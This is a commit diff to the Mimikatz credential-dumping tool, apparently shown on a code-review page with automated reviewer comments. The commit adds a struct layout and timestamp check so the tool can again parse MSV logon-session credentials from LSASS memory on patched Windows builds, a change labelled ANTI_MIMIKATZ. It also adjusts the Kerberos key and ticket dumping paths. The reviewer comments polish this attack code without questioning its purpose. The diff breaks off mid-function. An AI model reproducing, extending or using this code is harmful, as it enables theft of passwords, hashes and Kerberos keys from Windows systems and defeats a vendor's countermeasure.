Update to Mimikatz commit 8d83d5ab93396263b8c8be8401381b02868fdad6
This fixes the breakages on patched systems (I think). There's also a fix here for an infinite loop in the MSV code.
This commit is contained in:
parent
4e1201d73c
commit
15d11f0e9f
@ -47,6 +47,7 @@ const KUHL_M_SEKURLSA_ENUM_HELPER lsassEnumHelpers[] = {
|
||||
{sizeof(KIWI_MSV1_0_LIST_52), FIELD_OFFSET(KIWI_MSV1_0_LIST_52, LocallyUniqueIdentifier), FIELD_OFFSET(KIWI_MSV1_0_LIST_52, LogonType), FIELD_OFFSET(KIWI_MSV1_0_LIST_52, Session), FIELD_OFFSET(KIWI_MSV1_0_LIST_52, UserName), FIELD_OFFSET(KIWI_MSV1_0_LIST_52, Domaine), FIELD_OFFSET(KIWI_MSV1_0_LIST_52, Credentials), FIELD_OFFSET(KIWI_MSV1_0_LIST_52, pSid), FIELD_OFFSET(KIWI_MSV1_0_LIST_52, CredentialManager)},
|
||||
{sizeof(KIWI_MSV1_0_LIST_60), FIELD_OFFSET(KIWI_MSV1_0_LIST_60, LocallyUniqueIdentifier), FIELD_OFFSET(KIWI_MSV1_0_LIST_60, LogonType), FIELD_OFFSET(KIWI_MSV1_0_LIST_60, Session), FIELD_OFFSET(KIWI_MSV1_0_LIST_60, UserName), FIELD_OFFSET(KIWI_MSV1_0_LIST_60, Domaine), FIELD_OFFSET(KIWI_MSV1_0_LIST_60, Credentials), FIELD_OFFSET(KIWI_MSV1_0_LIST_60, pSid), FIELD_OFFSET(KIWI_MSV1_0_LIST_60, CredentialManager)},
|
||||
{sizeof(KIWI_MSV1_0_LIST_61), FIELD_OFFSET(KIWI_MSV1_0_LIST_61, LocallyUniqueIdentifier), FIELD_OFFSET(KIWI_MSV1_0_LIST_61, LogonType), FIELD_OFFSET(KIWI_MSV1_0_LIST_61, Session), FIELD_OFFSET(KIWI_MSV1_0_LIST_61, UserName), FIELD_OFFSET(KIWI_MSV1_0_LIST_61, Domaine), FIELD_OFFSET(KIWI_MSV1_0_LIST_61, Credentials), FIELD_OFFSET(KIWI_MSV1_0_LIST_61, pSid), FIELD_OFFSET(KIWI_MSV1_0_LIST_61, CredentialManager)},
|
||||
{sizeof(KIWI_MSV1_0_LIST_61_ANTI_MIMIKATZ), FIELD_OFFSET(KIWI_MSV1_0_LIST_61_ANTI_MIMIKATZ, LocallyUniqueIdentifier), FIELD_OFFSET(KIWI_MSV1_0_LIST_61_ANTI_MIMIKATZ, LogonType), FIELD_OFFSET(KIWI_MSV1_0_LIST_61_ANTI_MIMIKATZ, Session), FIELD_OFFSET(KIWI_MSV1_0_LIST_61_ANTI_MIMIKATZ, UserName), FIELD_OFFSET(KIWI_MSV1_0_LIST_61_ANTI_MIMIKATZ, Domaine), FIELD_OFFSET(KIWI_MSV1_0_LIST_61_ANTI_MIMIKATZ, Credentials), FIELD_OFFSET(KIWI_MSV1_0_LIST_61_ANTI_MIMIKATZ, pSid), FIELD_OFFSET(KIWI_MSV1_0_LIST_61_ANTI_MIMIKATZ, CredentialManager)},
|
||||
{sizeof(KIWI_MSV1_0_LIST_62), FIELD_OFFSET(KIWI_MSV1_0_LIST_62, LocallyUniqueIdentifier), FIELD_OFFSET(KIWI_MSV1_0_LIST_62, LogonType), FIELD_OFFSET(KIWI_MSV1_0_LIST_62, Session), FIELD_OFFSET(KIWI_MSV1_0_LIST_62, UserName), FIELD_OFFSET(KIWI_MSV1_0_LIST_62, Domaine), FIELD_OFFSET(KIWI_MSV1_0_LIST_62, Credentials), FIELD_OFFSET(KIWI_MSV1_0_LIST_62, pSid), FIELD_OFFSET(KIWI_MSV1_0_LIST_62, CredentialManager)},
|
||||
{sizeof(KIWI_MSV1_0_LIST_63), FIELD_OFFSET(KIWI_MSV1_0_LIST_63, LocallyUniqueIdentifier), FIELD_OFFSET(KIWI_MSV1_0_LIST_63, LogonType), FIELD_OFFSET(KIWI_MSV1_0_LIST_63, Session), FIELD_OFFSET(KIWI_MSV1_0_LIST_63, UserName), FIELD_OFFSET(KIWI_MSV1_0_LIST_63, Domaine), FIELD_OFFSET(KIWI_MSV1_0_LIST_63, Credentials), FIELD_OFFSET(KIWI_MSV1_0_LIST_63, pSid), FIELD_OFFSET(KIWI_MSV1_0_LIST_63, CredentialManager)},
|
||||
};
|
||||
@ -317,9 +318,13 @@ NTSTATUS kuhl_m_sekurlsa_enum(PKUHL_M_SEKURLSA_ENUM callback, LPVOID pOptionalDa
|
||||
if(cLsass.osContext.BuildNumber < KULL_M_WIN_MIN_BUILD_8)
|
||||
helper = &lsassEnumHelpers[3];
|
||||
if(cLsass.osContext.BuildNumber < KULL_M_WIN_MIN_BUILD_BLUE)
|
||||
helper = &lsassEnumHelpers[4];
|
||||
else
|
||||
helper = &lsassEnumHelpers[5];
|
||||
else
|
||||
helper = &lsassEnumHelpers[6];
|
||||
|
||||
|
||||
if((cLsass.osContext.BuildNumber >= KULL_M_WIN_MIN_BUILD_7) && (cLsass.osContext.BuildNumber < KULL_M_WIN_MIN_BUILD_BLUE) && (kuhl_m_sekurlsa_msv_package.Module.Informations.TimeDateStamp > 0x53480000))
|
||||
helper++; // yeah, really, I do that =)
|
||||
|
||||
securityStruct.hMemory = cLsass.hLsassMem;
|
||||
securityStruct.address = LogonSessionListCount;
|
||||
@ -389,7 +394,9 @@ BOOL CALLBACK kuhl_m_sekurlsa_enum_callback_logondata(IN PKIWI_BASIC_SECURITY_LO
|
||||
dprintf(L"[KIWI] callback invoked with %p", pData);
|
||||
if((pData->LogonType != Network)/* && pData->LogonType != UndefinedLogonType*/)
|
||||
{
|
||||
kuhl_m_sekurlsa_printinfos_logonData(pData);
|
||||
dprintf(L"[KIWI] pData->LogonType != Network, printing logon data");
|
||||
//kuhl_m_sekurlsa_printinfos_logonData(pData);
|
||||
dprintf(L"[KIWI] logondata printed, iterating through packages");
|
||||
for(i = 0; i < pLsassData->nbPackages; i++)
|
||||
{
|
||||
if(pLsassData->lsassPackages[i]->Module.isPresent && lsassPackages[i]->isValid)
|
||||
@ -399,6 +406,7 @@ BOOL CALLBACK kuhl_m_sekurlsa_enum_callback_logondata(IN PKIWI_BASIC_SECURITY_LO
|
||||
kprintf(L"\n");
|
||||
}
|
||||
}
|
||||
dprintf(L"[KIWI] package iteration done");
|
||||
}
|
||||
return TRUE;
|
||||
}
|
||||
@ -612,7 +620,7 @@ VOID kuhl_m_sekurlsa_genericCredsOutput(PKIWI_GENERIC_PRIMARY_CREDENTIAL mesCred
|
||||
else if(flags & KUHL_SEKURLSA_CREDS_DISPLAY_KEY_LIST)
|
||||
{
|
||||
pHashPassword = (PKERB_HASHPASSWORD_GENERIC) mesCreds;
|
||||
kprintf(L"\t%s : ", kuhl_m_kerberos_ticket_etype(pHashPassword->Type));
|
||||
kprintf(L"\t %s ", kuhl_m_kerberos_ticket_etype(pHashPassword->Type));
|
||||
if (buffer.Length = buffer.MaximumLength = (USHORT)pHashPassword->Size)
|
||||
{
|
||||
buffer.Buffer = (PWSTR)pHashPassword->Checksump;
|
||||
|
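Review bot: The `helper++; // yeah, really, I do that =)` line in the kuhl_m_sekurlsa_enum hunk leaves two load-bearing facts undocumented: the increment only selects the right layout if the table holds the patched-build entry directly after the unpatched one for every build in the `KULL_M_WIN_MIN_BUILD_7`..`KULL_M_WIN_MIN_BUILD_BLUE` range (the first hunk shows this adjacency only for KIWI_MSV1_0_LIST_61 / KIWI_MSV1_0_LIST_61_ANTI_MIMIKATZ), and `0x53480000` is a bare PE timestamp (roughly April 2014) with no name. A future reorder of lsassEnumHelpers, or a new entry slipped between those two, would silently pick the wrong layout with no compile-time signal. I would replace the joke with `// lsasrv builds whose FileHeader.TimeDateStamp is after 0x53480000 (~April 2014) use the *_ANTI_MIMIKATZ layout, which must stay immediately after the matching unpatched entry in lsassEnumHelpers` and hoist the literal into a named constant beside the table. The enclosing function starts and ends outside the hunk, and the commented-out `//kuhl_m_sekurlsa_printinfos_logonData(pData);` left in the callback_logondata hunk next to the live call should be deleted rather than kept.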
@ -149,6 +149,43 @@ typedef struct _KIWI_MSV1_0_LIST_61 {
|
||||
PVOID CredentialManager;
|
||||
} KIWI_MSV1_0_LIST_61, *PKIWI_MSV1_0_LIST_61;
|
||||
|
||||
typedef struct _KIWI_MSV1_0_LIST_61_ANTI_MIMIKATZ {
|
||||
struct _KIWI_MSV1_0_LIST_61_ANTI_MIMIKATZ *Flink;
|
||||
struct _KIWI_MSV1_0_LIST_61_ANTI_MIMIKATZ *Blink;
|
||||
PVOID unk0;
|
||||
ULONG unk1;
|
||||
PVOID unk2;
|
||||
ULONG unk3;
|
||||
ULONG unk4;
|
||||
ULONG unk5;
|
||||
HANDLE hSemaphore6;
|
||||
PVOID unk7;
|
||||
HANDLE hSemaphore8;
|
||||
PVOID unk9;
|
||||
PVOID unk10;
|
||||
ULONG unk11;
|
||||
ULONG unk12;
|
||||
PVOID unk13;
|
||||
LUID LocallyUniqueIdentifier;
|
||||
LUID SecondaryLocallyUniqueIdentifier;
|
||||
BYTE waza[12]; /// to do (maybe align) <===================
|
||||
LSA_UNICODE_STRING UserName;
|
||||
LSA_UNICODE_STRING Domaine;
|
||||
PVOID unk14;
|
||||
PVOID unk15;
|
||||
PSID pSid;
|
||||
ULONG LogonType;
|
||||
ULONG Session;
|
||||
LARGE_INTEGER LogonTime; // autoalign x86
|
||||
LSA_UNICODE_STRING LogonServer;
|
||||
PKIWI_MSV1_0_CREDENTIALS Credentials;
|
||||
PVOID unk19;
|
||||
PVOID unk20;
|
||||
PVOID unk21;
|
||||
ULONG unk22;
|
||||
PVOID CredentialManager;
|
||||
} KIWI_MSV1_0_LIST_61_ANTI_MIMIKATZ, *PKIWI_MSV1_0_LIST_61_ANTI_MIMIKATZ;
|
||||
|
||||
typedef struct _KIWI_MSV1_0_LIST_62 {
|
||||
struct _KIWI_MSV1_0_LIST_62 *Flink;
|
||||
struct _KIWI_MSV1_0_LIST_62 *Blink;
|
||||
|
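Review bot: `BYTE waza[12]; /// to do (maybe align) <===================` in the new KIWI_MSV1_0_LIST_61_ANTI_MIMIKATZ struct ships an unresolved padding guess, and `LARGE_INTEGER LogonTime; // autoalign x86` shows the layout is already architecture-sensitive. Every field after that gap (UserName, Domaine, pSid, LogonType, Session, Credentials, CredentialManager) is consumed through FIELD_OFFSET in lsassEnumHelpers, so a gap that is off by a few bytes decodes the wrong fields rather than failing loudly. I would replace the placeholder with a comment stating which lsasrv build the layout was taken from and whether the 12-byte gap was verified on both x86 and x64, and add a compile-time check on one verified offset, e.g. `C_ASSERT(FIELD_OFFSET(KIWI_MSV1_0_LIST_61_ANTI_MIMIKATZ, UserName) == <verified offset, per architecture>);`, so a wrong guess breaks the build instead of the read. The `///` prefix also reads as a doc-comment marker the rest of these headers do not use.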
@ -5,7 +5,7 @@
|
||||
*/
|
||||
#include "kuhl_m_sekurlsa_credman.h"
|
||||
|
||||
KUHL_M_SEKURLSA_PACKAGE kuhl_m_sekurlsa_credman_package = {L"credman", kuhl_m_sekurlsa_enum_logon_callback_credman, TRUE, L"lsasrv.dll", {{{NULL, NULL}, 0, NULL}, FALSE, FALSE}};
|
||||
KUHL_M_SEKURLSA_PACKAGE kuhl_m_sekurlsa_credman_package = {L"credman", kuhl_m_sekurlsa_enum_logon_callback_credman, TRUE, L"lsasrv.dll", {{{NULL, NULL}, 0, 0, NULL}, FALSE, FALSE}};
|
||||
const PKUHL_M_SEKURLSA_PACKAGE kuhl_m_sekurlsa_credman_single_package[] = {&kuhl_m_sekurlsa_credman_package};
|
||||
|
||||
NTSTATUS kuhl_m_sekurlsa_credman(int argc, wchar_t * argv[])
|
||||
|
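Review bot: The extra `0` in `{{{NULL, NULL}, 0, 0, NULL}, FALSE, FALSE}` is a positional initializer for the nested Module member, and the identical one-character edit is repeated in the dpapi, kerberos, livessp, msv, ssp, tspkg and wdigest package definitions in this commit; inserting TimeDateStamp mid-struct forced an eight-file sweep, and the next field insertion will need the same sweep with no compiler help if one site is missed, because a short positional list still compiles. Every one of these packages starts with an all-zero Module, so the initializer can be written once in a form that absorbs future fields: `KUHL_M_SEKURLSA_PACKAGE kuhl_m_sekurlsa_credman_package = {L"credman", kuhl_m_sekurlsa_enum_logon_callback_credman, TRUE, L"lsasrv.dll", {0}};`. The same applies to the seven sibling files.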
@ -30,8 +30,8 @@ KULL_M_PATCH_GENERIC MasterKeyCacheReferences[] = {
|
||||
|
||||
PKIWI_MASTERKEY_CACHE_ENTRY pMasterKeyCacheList = NULL;
|
||||
|
||||
KUHL_M_SEKURLSA_PACKAGE kuhl_m_sekurlsa_dpapi_lsa_package = {L"dpapi", NULL, FALSE, L"lsasrv.dll", {{{NULL, NULL}, 0, NULL}, FALSE, FALSE}};
|
||||
KUHL_M_SEKURLSA_PACKAGE kuhl_m_sekurlsa_dpapi_svc_package = {L"dpapi", NULL, FALSE, L"dpapisrv.dll", {{{NULL, NULL}, 0, NULL}, FALSE, FALSE}};
|
||||
KUHL_M_SEKURLSA_PACKAGE kuhl_m_sekurlsa_dpapi_lsa_package = {L"dpapi", NULL, FALSE, L"lsasrv.dll", {{{NULL, NULL}, 0, 0, NULL}, FALSE, FALSE}};
|
||||
KUHL_M_SEKURLSA_PACKAGE kuhl_m_sekurlsa_dpapi_svc_package = {L"dpapi", NULL, FALSE, L"dpapisrv.dll", {{{NULL, NULL}, 0, 0, NULL}, FALSE, FALSE}};
|
||||
|
||||
NTSTATUS kuhl_m_sekurlsa_dpapi(int argc, wchar_t * argv[])
|
||||
{
|
||||
|
@ -126,7 +126,7 @@ const KERB_INFOS kerbHelper[] = {
|
||||
},
|
||||
};
|
||||
|
||||
KUHL_M_SEKURLSA_PACKAGE kuhl_m_sekurlsa_kerberos_package = {L"kerberos", kuhl_m_sekurlsa_enum_logon_callback_kerberos, TRUE, L"kerberos.dll", {{{NULL, NULL}, 0, NULL}, FALSE, FALSE}};
|
||||
KUHL_M_SEKURLSA_PACKAGE kuhl_m_sekurlsa_kerberos_package = {L"kerberos", kuhl_m_sekurlsa_enum_logon_callback_kerberos, TRUE, L"kerberos.dll", {{{NULL, NULL}, 0, 0, NULL}, FALSE, FALSE}};
|
||||
const PKUHL_M_SEKURLSA_PACKAGE kuhl_m_sekurlsa_kerberos_single_package[] = {&kuhl_m_sekurlsa_kerberos_package};
|
||||
|
||||
NTSTATUS kuhl_m_sekurlsa_kerberos(int argc, wchar_t * argv[])
|
||||
@ -184,6 +184,8 @@ void CALLBACK kuhl_m_sekurlsa_enum_kerberos_callback_tickets(IN PKIWI_BASIC_SECU
|
||||
PKIWI_KERBEROS_ENUM_DATA_TICKET ticketData = (PKIWI_KERBEROS_ENUM_DATA_TICKET)pOptionalData;
|
||||
DWORD i;
|
||||
kuhl_m_sekurlsa_printinfos_logonData(pData);
|
||||
kuhl_m_sekurlsa_enum_kerberos_callback_passwords(pData, Localkerbsession, RemoteLocalKerbSession, NULL);
|
||||
kprintf(L"\n");
|
||||
for (i = 0; i < 3; i++)
|
||||
{
|
||||
kprintf(L"\n\tGroup %u - %s", i, KUHL_M_SEKURLSA_KERBEROS_TICKET_TYPE[i]);
|
||||
@ -199,7 +201,8 @@ void CALLBACK kuhl_m_sekurlsa_enum_kerberos_callback_keys(IN PKIWI_BASIC_SECURIT
|
||||
if (RemoteLocalKerbSession.address = *(PVOID *)((PBYTE)Localkerbsession.address + kerbHelper[KerbOffsetIndex].offsetKeyList))
|
||||
{
|
||||
kuhl_m_sekurlsa_printinfos_logonData(pData);
|
||||
kprintf(L"\n\tKey List @ %p\n", RemoteLocalKerbSession.address);
|
||||
kuhl_m_sekurlsa_enum_kerberos_callback_passwords(pData, Localkerbsession, RemoteLocalKerbSession, NULL);
|
||||
kprintf(L"\n\t * Key List :\n");
|
||||
if (aLocalKeyMemory.address = LocalAlloc(LPTR, kerbHelper[KerbOffsetIndex].structKeyListSize))
|
||||
{
|
||||
if (kull_m_memory_copy(&aLocalKeyMemory, &RemoteLocalKerbSession, kerbHelper[KerbOffsetIndex].structKeyListSize))
|
||||
@ -397,7 +400,7 @@ void kuhl_m_sekurlsa_kerberos_enum_tickets(IN PKIWI_BASIC_SECURITY_LOGON_SESSION
|
||||
if (App_KrbCred = kuhl_m_kerberos_ticket_createAppKrbCred(pKiwiTicket))
|
||||
{
|
||||
if (kull_m_file_writeData(filename, (PBYTE)App_KrbCred, kull_m_asn1_getSize(App_KrbCred)))
|
||||
kprintf(L"\n\t * Saved to file %s !\n", filename);
|
||||
kprintf(L"\n\t * Saved to file %s !", filename);
|
||||
else PRINT_ERROR_AUTO(L"kull_m_file_writeData");
|
||||
LocalFree(App_KrbCred);
|
||||
}
|
||||
|
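Review bot: In the kuhl_m_sekurlsa_kerberos_enum_tickets hunk the rewritten `kprintf(L"\n\t * Saved to file %s !", filename);` is the body of an unbraced `if`, followed by `else PRINT_ERROR_AUTO(L"kull_m_file_writeData");`; an unbraced if/else whose else arm is a macro is the exact shape that dangling-else and goto-fail bugs come from, and since this line was just touched it is the moment to brace both arms. Dropping the trailing `\n` also means the success message now ends without a line break while the error branch presumably emits its own; if PRINT_ERROR_AUTO does not, the next output runs onto the same line. The enclosing function starts and ends outside the hunk. The `kuhl_m_sekurlsa_enum_kerberos_callback_passwords(pData, Localkerbsession, RemoteLocalKerbSession, NULL);` calls added to the tickets and keys callbacks would benefit from a one-line comment saying why that callback is now invoked from inside those two enumerations.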
@ -18,7 +18,7 @@ KULL_M_PATCH_GENERIC LiveReferences[] = {
|
||||
|
||||
PKIWI_LIVESSP_LIST_ENTRY LiveGlobalLogonSessionList = NULL;
|
||||
|
||||
KUHL_M_SEKURLSA_PACKAGE kuhl_m_sekurlsa_livessp_package = {L"livessp", kuhl_m_sekurlsa_enum_logon_callback_livessp, FALSE, L"livessp.dll", {{{NULL, NULL}, 0, NULL}, FALSE, FALSE}};
|
||||
KUHL_M_SEKURLSA_PACKAGE kuhl_m_sekurlsa_livessp_package = {L"livessp", kuhl_m_sekurlsa_enum_logon_callback_livessp, FALSE, L"livessp.dll", {{{NULL, NULL}, 0, 0, NULL}, FALSE, FALSE}};
|
||||
const PKUHL_M_SEKURLSA_PACKAGE kuhl_m_sekurlsa_livessp_single_package[] = {&kuhl_m_sekurlsa_livessp_package};
|
||||
|
||||
NTSTATUS kuhl_m_sekurlsa_livessp(int argc, wchar_t * argv[])
|
||||
|
@ -9,7 +9,7 @@ const ANSI_STRING
|
||||
PRIMARY_STRING = {7, 8, "Primary"},
|
||||
CREDENTIALKEYS_STRING = {14, 15, "CredentialKeys"};
|
||||
|
||||
KUHL_M_SEKURLSA_PACKAGE kuhl_m_sekurlsa_msv_package = {L"msv", kuhl_m_sekurlsa_enum_logon_callback_msv, TRUE, L"lsasrv.dll", {{{NULL, NULL}, 0, NULL}, FALSE, FALSE}};
|
||||
KUHL_M_SEKURLSA_PACKAGE kuhl_m_sekurlsa_msv_package = {L"msv", kuhl_m_sekurlsa_enum_logon_callback_msv, TRUE, L"lsasrv.dll", {{{NULL, NULL}, 0, 0, NULL}, FALSE, FALSE}};
|
||||
const PKUHL_M_SEKURLSA_PACKAGE kuhl_m_sekurlsa_msv_single_package[] = {&kuhl_m_sekurlsa_msv_package};
|
||||
|
||||
NTSTATUS kuhl_m_sekurlsa_msv(int argc, wchar_t * argv[])
|
||||
@ -94,34 +94,40 @@ VOID kuhl_m_sekurlsa_msv_enum_cred(IN PKUHL_M_SEKURLSA_CONTEXT cLsass, IN PVOID
|
||||
{
|
||||
KIWI_MSV1_0_CREDENTIALS credentials;
|
||||
KIWI_MSV1_0_PRIMARY_CREDENTIALS primaryCredentials;
|
||||
KULL_M_MEMORY_HANDLE hLocalMemory = {KULL_M_MEMORY_TYPE_OWN, NULL};
|
||||
KULL_M_MEMORY_ADDRESS aLocalMemory = {NULL, &hLocalMemory}, aLsassMemory = {pCredentials, cLsass->hLsassMem};
|
||||
KULL_M_MEMORY_HANDLE hLocalMemory = { KULL_M_MEMORY_TYPE_OWN, NULL };
|
||||
KULL_M_MEMORY_ADDRESS aLocalMemory = { NULL, &hLocalMemory }, aLsassMemory = { pCredentials, cLsass->hLsassMem };
|
||||
|
||||
while(aLsassMemory.address)
|
||||
while (aLsassMemory.address)
|
||||
{
|
||||
aLocalMemory.address = &credentials;
|
||||
if(kull_m_memory_copy(&aLocalMemory, &aLsassMemory, sizeof(KIWI_MSV1_0_CREDENTIALS)))
|
||||
if (kull_m_memory_copy(&aLocalMemory, &aLsassMemory, sizeof(KIWI_MSV1_0_CREDENTIALS)))
|
||||
{
|
||||
aLsassMemory.address = credentials.PrimaryCredentials;
|
||||
while(aLsassMemory.address)
|
||||
while (aLsassMemory.address)
|
||||
{
|
||||
aLocalMemory.address = &primaryCredentials;
|
||||
if(kull_m_memory_copy(&aLocalMemory, &aLsassMemory, sizeof(KIWI_MSV1_0_PRIMARY_CREDENTIALS)))
|
||||
if (kull_m_memory_copy(&aLocalMemory, &aLsassMemory, sizeof(KIWI_MSV1_0_PRIMARY_CREDENTIALS)))
|
||||
{
|
||||
aLsassMemory.address = primaryCredentials.Credentials.Buffer;
|
||||
if(kull_m_string_getUnicodeString(&primaryCredentials.Credentials, cLsass->hLsassMem))
|
||||
if (kull_m_string_getUnicodeString(&primaryCredentials.Credentials, cLsass->hLsassMem))
|
||||
{
|
||||
if(kull_m_string_getUnicodeString((PUNICODE_STRING) &primaryCredentials.Primary, cLsass->hLsassMem))
|
||||
if (kull_m_string_getUnicodeString((PUNICODE_STRING)&primaryCredentials.Primary, cLsass->hLsassMem))
|
||||
{
|
||||
credCallback(&primaryCredentials, credentials.AuthenticationPackageId, &aLsassMemory, optionalData);
|
||||
LocalFree(primaryCredentials.Primary.Buffer);
|
||||
}
|
||||
}
|
||||
LocalFree(primaryCredentials.Credentials.Buffer);
|
||||
}
|
||||
} else kprintf(L"n.e. (KIWI_MSV1_0_PRIMARY_CREDENTIALS KO)");
|
||||
}
|
||||
else kprintf(L"n.e. (KIWI_MSV1_0_PRIMARY_CREDENTIALS KO)");
|
||||
aLsassMemory.address = primaryCredentials.next;
|
||||
}
|
||||
aLsassMemory.address = credentials.next;
|
||||
} else kprintf(L"n.e. (KIWI_MSV1_0_CREDENTIALS KO)");
|
||||
}
|
||||
else
|
||||
{
|
||||
kprintf(L"n.e. (KIWI_MSV1_0_CREDENTIALS KO)");
|
||||
break;
|
||||
}
|
||||
}
|
||||
}
|
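Review bot: The inner loop of kuhl_m_sekurlsa_msv_enum_cred still has the failure mode the outer loop just had fixed: when the `kull_m_memory_copy` of KIWI_MSV1_0_PRIMARY_CREDENTIALS fails, the new `else kprintf(L"n.e. (KIWI_MSV1_0_PRIMARY_CREDENTIALS KO)");` falls through to `aLsassMemory.address = primaryCredentials.next;`, which reads a stale `primaryCredentials` from the previous iteration or, on the first pass, an uninitialised automatic struct (undefined behaviour), so the walk continues on garbage instead of stopping. Mirror the outer fix: `else { kprintf(L"n.e. (KIWI_MSV1_0_PRIMARY_CREDENTIALS KO)"); break; }`. The whitespace-only `if(` → `if (` and `while(` → `while (` rewrites in the same hunk bury the one functional change (the added `break`); keeping reformatting in its own commit would make the fix reviewable.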
@ -23,7 +23,7 @@ KULL_M_PATCH_GENERIC SspReferences[] = {
|
||||
|
||||
PKIWI_SSP_CREDENTIAL_LIST_ENTRY SspCredentialList = NULL;
|
||||
|
||||
KUHL_M_SEKURLSA_PACKAGE kuhl_m_sekurlsa_ssp_package = {L"ssp", kuhl_m_sekurlsa_enum_logon_callback_ssp, TRUE, L"msv1_0.dll", {{{NULL, NULL}, 0, NULL}, FALSE, FALSE}};
|
||||
KUHL_M_SEKURLSA_PACKAGE kuhl_m_sekurlsa_ssp_package = {L"ssp", kuhl_m_sekurlsa_enum_logon_callback_ssp, TRUE, L"msv1_0.dll", {{{NULL, NULL}, 0, 0, NULL}, FALSE, FALSE}};
|
||||
const PKUHL_M_SEKURLSA_PACKAGE kuhl_m_sekurlsa_ssp_single_package[] = {&kuhl_m_sekurlsa_ssp_package};
|
||||
|
||||
NTSTATUS kuhl_m_sekurlsa_ssp(int argc, wchar_t * argv[])
|
||||
|
@ -20,7 +20,7 @@ KULL_M_PATCH_GENERIC TsPkgReferences[] = {
|
||||
|
||||
PRTL_AVL_TABLE TSGlobalCredTable = NULL;
|
||||
|
||||
KUHL_M_SEKURLSA_PACKAGE kuhl_m_sekurlsa_tspkg_package = {L"tspkg", kuhl_m_sekurlsa_enum_logon_callback_tspkg, TRUE, L"tspkg.dll", {{{NULL, NULL}, 0, NULL}, FALSE, FALSE}};
|
||||
KUHL_M_SEKURLSA_PACKAGE kuhl_m_sekurlsa_tspkg_package = {L"tspkg", kuhl_m_sekurlsa_enum_logon_callback_tspkg, TRUE, L"tspkg.dll", {{{NULL, NULL}, 0, 0, NULL}, FALSE, FALSE}};
|
||||
const PKUHL_M_SEKURLSA_PACKAGE kuhl_m_sekurlsa_tspkg_single_package[] = {&kuhl_m_sekurlsa_tspkg_package};
|
||||
|
||||
NTSTATUS kuhl_m_sekurlsa_tspkg(int argc, wchar_t * argv[])
|
||||
|
@ -27,7 +27,7 @@ KULL_M_PATCH_GENERIC WDigestReferences[] = {
|
||||
PKIWI_WDIGEST_LIST_ENTRY l_LogSessList = NULL;
|
||||
LONG offsetWDigestPrimary = 0;
|
||||
|
||||
KUHL_M_SEKURLSA_PACKAGE kuhl_m_sekurlsa_wdigest_package = {L"wdigest", kuhl_m_sekurlsa_enum_logon_callback_wdigest, TRUE, L"wdigest.dll", {{{NULL, NULL}, 0, NULL}, FALSE, FALSE}};
|
||||
KUHL_M_SEKURLSA_PACKAGE kuhl_m_sekurlsa_wdigest_package = {L"wdigest", kuhl_m_sekurlsa_enum_logon_callback_wdigest, TRUE, L"wdigest.dll", {{{NULL, NULL}, 0, 0, NULL}, FALSE, FALSE}};
|
||||
const PKUHL_M_SEKURLSA_PACKAGE kuhl_m_sekurlsa_wdigest_single_package[] = {&kuhl_m_sekurlsa_wdigest_package};
|
||||
|
||||
NTSTATUS kuhl_m_sekurlsa_wdigest(int argc, wchar_t * argv[])
|
||||
|
@ -101,6 +101,7 @@ NTSTATUS kull_m_process_getVeryBasicModuleInformations(PKULL_M_MEMORY_HANDLE mem
|
||||
moduleInformation.DllBase.address = pLdrEntry->DllBase;
|
||||
moduleInformation.SizeOfImage = pLdrEntry->SizeOfImage;
|
||||
moduleInformation.NameDontUseOutsideCallback = &pLdrEntry->BaseDllName;
|
||||
kull_m_process_adjustTimeDateStamp(&moduleInformation);
|
||||
continueCallback = callBack(&moduleInformation, pvArg);
|
||||
}
|
||||
status = STATUS_SUCCESS;
|
||||
@ -121,6 +122,7 @@ NTSTATUS kull_m_process_getVeryBasicModuleInformations(PKULL_M_MEMORY_HANDLE mem
|
||||
moduleName.Length = pLdrEntry32->BaseDllName.Length;
|
||||
moduleName.MaximumLength = pLdrEntry32->BaseDllName.MaximumLength;
|
||||
moduleName.Buffer = (PWSTR) pLdrEntry32->BaseDllName.Buffer;
|
||||
kull_m_process_adjustTimeDateStamp(&moduleInformation);
|
||||
continueCallback = callBack(&moduleInformation, pvArg);
|
||||
}
|
||||
status = STATUS_SUCCESS;
|
||||
@ -151,8 +153,11 @@ NTSTATUS kull_m_process_getVeryBasicModuleInformations(PKULL_M_MEMORY_HANDLE mem
|
||||
if(moduleName.Buffer = (PWSTR) LocalAlloc(LPTR, moduleName.MaximumLength))
|
||||
{
|
||||
aBuffer.address = moduleName.Buffer; aProcess.address = LdrEntry.BaseDllName.Buffer;
|
||||
if(kull_m_memory_copy(&aBuffer, &aProcess, moduleName.MaximumLength))
|
||||
if (kull_m_memory_copy(&aBuffer, &aProcess, moduleName.MaximumLength))
|
||||
{
|
||||
kull_m_process_adjustTimeDateStamp(&moduleInformation);
|
||||
continueCallback = callBack(&moduleInformation, pvArg);
|
||||
}
|
||||
LocalFree(moduleName.Buffer);
|
||||
}
|
||||
}
|
||||
@ -185,8 +190,11 @@ NTSTATUS kull_m_process_getVeryBasicModuleInformations(PKULL_M_MEMORY_HANDLE mem
|
||||
if(moduleName.Buffer = (PWSTR) LocalAlloc(LPTR, moduleName.MaximumLength))
|
||||
{
|
||||
aBuffer.address = moduleName.Buffer; aProcess.address = (PVOID) LdrEntry32.BaseDllName.Buffer;
|
||||
if(kull_m_memory_copy(&aBuffer, &aProcess, moduleName.MaximumLength))
|
||||
if (kull_m_memory_copy(&aBuffer, &aProcess, moduleName.MaximumLength))
|
||||
{
|
||||
kull_m_process_adjustTimeDateStamp(&moduleInformation);
|
||||
continueCallback = callBack(&moduleInformation, pvArg);
|
||||
}
|
||||
LocalFree(moduleName.Buffer);
|
||||
}
|
||||
}
|
||||
@ -208,6 +216,7 @@ NTSTATUS kull_m_process_getVeryBasicModuleInformations(PKULL_M_MEMORY_HANDLE mem
|
||||
if(pMinidumpString = (PMINIDUMP_STRING) kull_m_minidump_RVAtoPTR(memory->pHandleProcessDmp->hMinidump, pMinidumpModuleList->Modules[i].ModuleNameRva))
|
||||
{
|
||||
RtlInitUnicodeString(&moduleName, wcsrchr(pMinidumpString->Buffer, L'\\') + 1);
|
||||
kull_m_process_adjustTimeDateStamp(&moduleInformation);
|
||||
continueCallback = callBack(&moduleInformation, pvArg);
|
||||
}
|
||||
}
|
||||
@ -223,6 +232,17 @@ NTSTATUS kull_m_process_getVeryBasicModuleInformations(PKULL_M_MEMORY_HANDLE mem
|
||||
return status;
|
||||
}
|
||||
|
||||
void kull_m_process_adjustTimeDateStamp(PKULL_M_PROCESS_VERY_BASIC_MODULE_INFORMATION information)
|
||||
{
|
||||
PIMAGE_NT_HEADERS ntHeaders;
|
||||
if (kull_m_process_ntheaders(&information->DllBase, &ntHeaders))
|
||||
{
|
||||
